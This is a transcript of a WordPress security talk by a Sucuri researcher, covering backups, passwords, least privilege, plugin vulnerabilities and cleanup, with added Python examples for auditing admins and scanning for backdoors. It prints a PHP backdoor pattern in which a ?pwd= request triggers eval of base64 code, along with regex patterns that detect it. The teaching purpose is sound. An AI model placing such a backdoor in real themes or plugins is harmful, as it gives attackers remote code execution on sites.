WordPress Security: Fundamentals for Professionals by Joseph ...
Transcript of WordPress Security: Fundamentals for Professionals by Joseph ...
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
ABOUT ME
WEB DESIGN AND INFORMATION SECURITY
- Committed to WordPress since 2008.
- SUCURI – Researcher and Account Manager: removing malware and protecting websites.
- Personally cleaned over 5,000 websites.
- SUCURI.NET | Twitter: @JHerbrandson
ABOUT SUCURI: Over 45 Security Professionals Making a Safer Web
- SECURITY SCANNING & ANALYSIS: Checking the health of over 3 million websites every month through our free Sitecheck Scanner: http://sitecheck.sucuri.net
- MALWARE CLEANUP: Cleaning and remediating 300 – 400 hacked or infected websites every day.
- ATTACK PROTECTION: Blocking over 33 million attacks and instances of malicious traffic every month.
- EDUCATION: Providing detailed and actionable security information through our blog at http://blog.sucuri.net
ATTACK TRAFFIC ORIGINS Map.Ipviking.com
A QUICK DEMO Attack in Progress:
https://www.youtube.com/watch?v=v4Xr3LrixVg&list=UUzkxqKA_bkNlj1-nX5f2LNA
Sooo… WHY? It’s Just Business…probably
- The Short Answer: Fame and Fortune
- $BILLION Spam – Generic Pharmaceuticals, Payday Loans, Gambling, Designer Brand Knock-Offs
- Hacktivism – Politics and religion at the speed of download
- Immaturity – Kids being kids
I. Start with the Basics
THE NEED FOR SECURITY THE STATE OF THE INTERNET
www.internetlivestats.com
HOSTING OPTIONS: Choose wisely
- Shared Hosting: Cheap
- Dedicated Hosting: All yours
- Managed Hosting: Done for you
MANAGED-HOSTING PROVIDERS WordPress Experts for Everyone!
SPEAKING OF ENVIRONMENT… Who is using the Public Wifi?
II. No Easy Path
WORD of WARNING No chance of 0% risk.
The next ‘0-Day’ attack is always around the corner…
SECURITY HEADLINES Proof: Seen the news lately?
III. ALWAYS Backup
BUT I’VE NEVER HAD A PROBLEM BEFORE…
Have a low-profile, non-threatening site? You are still getting attention.
HACKERS HARD AT WORK
- PHARMACEUTICAL SPAM MAKES HACKERS TWO BILLION DOLLARS/YEAR
- SOLUTION: OFFSITE BACKUPS
- RESULT: CLEAN SITE IMMEDIATELY
- FREE WEBSITE REBRAND
AUTOMATED BACKUPS: Know you have a backup plan
- BackupBuddy: ithemes.com/backupbuddy/
- VaultPress: Vaultpress.com
- Sucuri backups: Sucuri.net
- Your hosting company’s backups
IV. Take Password Policy Seriously
Top 5 passwords used in 2013. Seriously….

| 2013 Rank | Password   | Last Year’s Rank |
|-----------|------------|------------------|
| 1         | 123456     | 2                |
| 2         | password   | 1                |
| 3         | 12345678   | 3                |
| 4         | qwerty     | 5                |
| 5         | abc123     | 4                |

credit: SplashData.com
PASSWORD MANAGER: Remembers your passwords so you don’t have to
- LastPass: lastpass.com
- 1Password: agilebits.com
- KeePass: keepass.info
- Dashlane: dashlane.com
LEAST PRIVILEGE: Does your user setup look like this?
[Diagram: access levels (hosting/control panel root access, Administrator, FTP/SFTP, Editor/contributor) against who actually holds them: actual admin 1; potential hackers 7; friends 12; writers 2; SEO guys 4; analysts 2; editors 1; random people 10; hackers 5; friends again 3]
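Added example, not code from the talk: an audit of who actually holds the administrator role, parsed from the serialized `wp_capabilities` values WordPress stores in `wp_usermeta`. The sample rows and the expected-admin list are constructed.

```python
import re

# Constructed sample rows, shaped like a dump of wp_users joined to wp_usermeta
# (meta_key = 'wp_capabilities'); the serialized PHP array is WordPress's own format.
SAMPLE_ROWS = [
    ("alice",   'a:1:{s:13:"administrator";b:1;}'),
    ("bob",     'a:1:{s:6:"editor";b:1;}'),
    ("seo-guy", 'a:1:{s:13:"administrator";b:1;}'),
    ("writer1", 'a:1:{s:6:"author";b:1;}'),
    ("old-dev", 'a:2:{s:13:"administrator";b:1;s:10:"subscriber";b:1;}'),
    ("friend",  'a:1:{s:11:"contributor";b:1;}'),
]

# One granted role inside the serialized array looks like: s:<len>:"<role>";b:1;
ROLE_RE = re.compile(r's:\d+:"([^"]+)";b:1;')

def roles_of(serialized):
    """Return the set of roles granted in a wp_capabilities value."""
    return set(ROLE_RE.findall(serialized))

def audit_admins(rows, expected_admins):
    """Return (all administrator logins, those not on the expected list), both sorted.
    Anything in the second list should be reviewed and demoted or removed."""
    admins = sorted(login for login, caps in rows if "administrator" in roles_of(caps))
    unexpected = [login for login in admins if login not in expected_admins]
    return admins, unexpected

if __name__ == "__main__":
    admins, unexpected = audit_admins(SAMPLE_ROWS, expected_admins={"alice"})
    print("administrators:", admins)
    print("unexpected administrators (review or demote):", unexpected)
```

On a live site `wp user list --role=administrator` (WP-CLI) gives the same listing; the parser above is for offline review of a database dump.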
V. Steal and Be Stolen From
NOT THE CODE YOU’RE LOOKING FOR… Assisting the enemy
This probably shouldn’t be in your theme:

```php
// Backdoor pattern: any request carrying ?pwd= makes eval() run attacker code hidden in base64.
if(isset($_GET['pwd'])) {
eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NBhY3RpdmF0ZXMsIGNoYW5nZWQgZWxlbWVudHMgaW4gdGhlIG9yaWdpbmFsIHBsdWdpbiwgZGVzaWduZWQgdG8gYmVoYXZlIGxpa2UgY2xlYW4gY29kZSwgc2lnbmFsIHRoZSBoYWNrZXIgdG8gbGV0IGl0IGtub3cgdGhhdCBpdOKAmXMgaW4uIEEgY2xlYW4gYmFjayBkb29yIGhhcyBiZWVuIG9wZW5lZCwgYW5kIHlvdXIgc2l0ZSBpcyBub3cgb24gYW4gYXV0b21hdGVkIGF0dGFjayBsaXN0LCBtZWFudCB0byBxdWlldGx5IGluZmVjdCBhbmQgcmVpbmZlY3QgeW91ciBzaXRlIGFnYWluIGFuZCBhZw==")); }
```
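As an added defensive example (not code from the talk), a small Python scanner that looks for the pattern shown above, eval() fed from a base64 literal, and reports whether a request parameter gates it. The theme files and the payload are constructed; the payload is decoded only for display and never executed.

```python
import base64
import re

# Constructed sample theme files (path -> source). footer.php follows the shape
# of the snippet above: a GET-parameter check guarding eval(base64_decode(...)).
# The payload is a harmless constructed string, not the one from the slide.
PAYLOAD = base64.b64encode(b'echo "constructed sample payload";').decode()
SAMPLE_FILES = {
    "theme/functions.php": "<?php\nadd_action('init', 'theme_setup');\n",
    "theme/footer.php": "<?php if(isset($_GET['pwd'])) {\n"
                        "eval(base64_decode(\"" + PAYLOAD + "\")); }\n",
}

# A request parameter read shortly before the eval marks a remotely triggered backdoor.
TRIGGER_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[")
# eval() fed directly from base64_decode() of a string literal.
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)")

def inspect_source(path, src):
    """Return one finding per eval(base64_decode("...")) in src. The payload is
    decoded only to give the reviewer a preview; it is never executed."""
    findings = []
    lines = src.splitlines()
    for idx, line in enumerate(lines):
        m = EVAL_B64_RE.search(line)
        if not m:
            continue
        try:
            preview = base64.b64decode(m.group(1), validate=True)[:60].decode("utf-8", "replace")
        except ValueError:
            preview = "<undecodable base64>"
        window = "\n".join(lines[max(0, idx - 3): idx + 1])  # eval plus 3 lines of context
        findings.append({
            "path": path,
            "line": idx + 1,
            "remote_trigger": TRIGGER_RE.search(window) is not None,
            "decoded_preview": preview,
        })
    return findings

def scan_files(files):
    """Scan a mapping of path -> source and return all findings, remote-triggered first."""
    found = [f for path, src in files.items() for f in inspect_source(path, src)]
    return sorted(found, key=lambda f: (not f["remote_trigger"], f["path"]))

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        kind = "remote-triggered" if f["remote_trigger"] else "unconditional"
        print(f"{f['path']}:{f['line']} {kind} eval(base64_decode) -> {f['decoded_preview']!r}")
```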
VI. Have a System
A SYSTEM TO LIVE BY
1. Protect! – Your computer has a firewall, why doesn’t your website?
2. Detect! – The same goes for antivirus.
3. Respond! – Clean up the mess. You have a backup, right?
Encompassing actions:
- Know the best practices
- Mind your maintenance
VII. Understand the Changing Landscape
WORDPRESS CORE: Strong and Secure
- Dedicated Creators: Making WordPress solid and secure
- Auto-Updates: Get important patches right away.
- Support: Everything you need at WordPress.org
WordPress Version Distribution 3.0 – 4.0 (wordpress.org/about/stats/)
3RD PARTY VULNERABILITIES: Keep watch
Vulnerabilities disclosed at http://blog.sucuri.net
- All-In-One SEO – 20 million downloads
- WPtouch – 6 million downloads
- MailPoet – 2.7 million downloads
- Custom Contact Forms – 640k downloads
- Slider Revolution – hundreds of thousands (themeforest/codecanyon)
Going further: Tips, Tools, and Services
WEBSITE ANTIVIRUS & FIREWALL: Protection and Detection
Don’t be the mark! Understand the changes you are implementing.
- “AntiVirus”: WordFence, Sucuri Website Antivirus
- “Firewall”: CloudFlare, Sucuri Website Firewall
- “Utilities”: iThemes Security, BruteProtect, Sucuri Security Plugin
RESOURCES: Because you don’t know what you don’t know
General WordPress Security:
- https://codex.wordpress.org/Hardening_WordPress
- https://blog.sucuri.net
Hacking and General Security:
- http://www.securityfocus.com/
- http://blogs.sophos.com/
Facebook Groups:
- WordPress Security
- Advanced WordPress
SubReddits:
- Reddit.com/r/Hacking
- Reddit.com/r/WordPress
EASY PATH TO CLEANUP (Response)
NEED:
- Releases of WordPress at: https://wordpress.org/download/release-archive/
- Clean backup of active theme and required plugins
- New passwords (WordPress, FTP, hosting control panel, everything else)
THANK YOU!